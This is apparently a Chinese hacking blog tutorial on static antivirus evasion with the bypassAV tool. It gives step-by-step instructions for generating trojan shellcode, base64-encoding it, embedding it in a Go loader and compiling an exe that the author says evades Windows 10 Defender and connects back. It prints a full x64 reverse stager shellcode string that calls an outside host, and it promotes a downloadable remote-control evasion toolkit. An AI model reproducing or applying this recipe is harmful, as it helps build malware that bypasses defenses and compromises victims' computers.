前言:
这里是使用bypassAV进行一个静态免杀,老手都用过就不用看了。我这里用默认的方式进行免杀,但其实已经不是很好用了,建议将其中的base64的加密方式大家自行改一改,可以换成其他编码,我这里先教大家走一遍制作流程,大家后期自己修改代码。工具包在文章末尾。
这里用到的软件,图中第一个(非箭头所指)
网址
代码语言:javascript复制http://bai1152770445.ysepan.com/
使用的bypassAV项目地址:
代码语言:javascript复制https://github.com/pureqh/bypassAV
正文:
首先这个bypassAV文件下我们要用到build.py这个文件生成一个main.go的文件,生成之前我们先修改一下里面的值。(我的bypassAV是放在kali中,不会用vim或者不太顺手的朋友先放windows环境下修改就好了。)
第28行最后面有个空格去掉,容易报错
然后35行中的网址替换成百度的
这里目的是测试目标机器是否连接外网,连接才运行,不然不运行。
我们生成main.go
生成好之后我们先生成一个木马的shellcode
可用 payload:C、Perl、Python、Ruby、Vell 必须 x64
我这里选择生成python的,大家可根据自己需求选择
生成之后的木马我们查看将其中的shellcode复制出来
代码语言:javascript复制buf = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8xb3x15x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx66x42x4fx66x00x35x4fx21x50x25x40x41x50x5bx34x5cx50x5ax58x35x34x28x50x5ex29x37x43x43x29x37x7dx24x45x49x43x41x52x2dx53x54x41x4ex44x41x52x44x2dx41x4ex54x49x56x49x52x55x53x2dx54x45x53x54x2dx46x49x4cx45x21x24x48x2bx48x2ax00x35x4fx21x50x25x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x31x30x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex32x3bx20x57x69x6ex36x34x3bx20x78x36x34x3bx20x54x72x69x64x65x6ex74x2fx36x2ex30x29x0dx0ax00x35x4fx21x50x25x40x41x50x5bx34x5cx50x5ax58x35x34x28x50x5ex29x37x43x43x29x37x7dx24x45x49x43x41x52x2dx53x54x41x4ex44x41x52x44x2dx41x4ex54x49x56x49x52x55x53x2dx54x45x53x54x2dx46x49x4cx45x21x24x48x2bx48x2ax00x35x4fx21x50x25x40x41x50x5bx34x5cx50x5ax58x35x34x28x50x5ex29x37x43x43x29x37x7dx24x45x49x43x41x52x2dx53x54x41x4ex44x41x52x44x2dx41x4ex54x49x56x49x52x55x53x2dx54x45x53x54x2dx46x49x4cx45x21x24x48x2bx48x2ax00x35x4fx21x50x25x40x41x50x5bx34x5cx50x5ax58x35x34x28x50x5ex29x37x43x43x29x37x7dx24x45x49x43x41x52x2dx53x54x41x4ex44x41x52x44x2dx41x4ex54x49x56x49x52x55x53x2dx54x45x53x54x2dx46x49x4cx45x21x24x48x2bx48x2ax00x35x4fx21x50x25x40x41x50x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex30x2ex31x30x37x00x00x00x00x00"
这里我贴出来防止有些新手不知道
下一步我们来修改
这个文件,我们修改下面几个
删除
代码语言:javascript复制buf1 = b"shellcode"
然后将我们复制的shellcode放到他原本的位置
箭头处加载的包可以删了,我图片上的已经删了
这里的buf1改成buf,懂代码的自然懂,不懂得照做就好。
然后保存退出,再运行。
代码语言:javascript复制python go_shellcode_encode.py
这是base64加密后的shellcode,我们复制出来
最后我们打开main.go,将下面复制的加密后的放到下图中位置
然后我们保存,将main.go编译为exe文件
这里需要go环境,大家就上网自己找教程吧。
最后我测试了一下win10自带的,可以静态免杀,双击后也是成功上线了。
动态就自己研究了,拿出来分分钟就没用了。ps:这个静态也不知道能维持多久,过多少杀软,大家自行测试。
大家关注公众号,发送
代码语言:javascript复制远控免杀合集
获取工具包
代码语言:javascript复制公众号:白安全组
网址:www.wangehacker.cn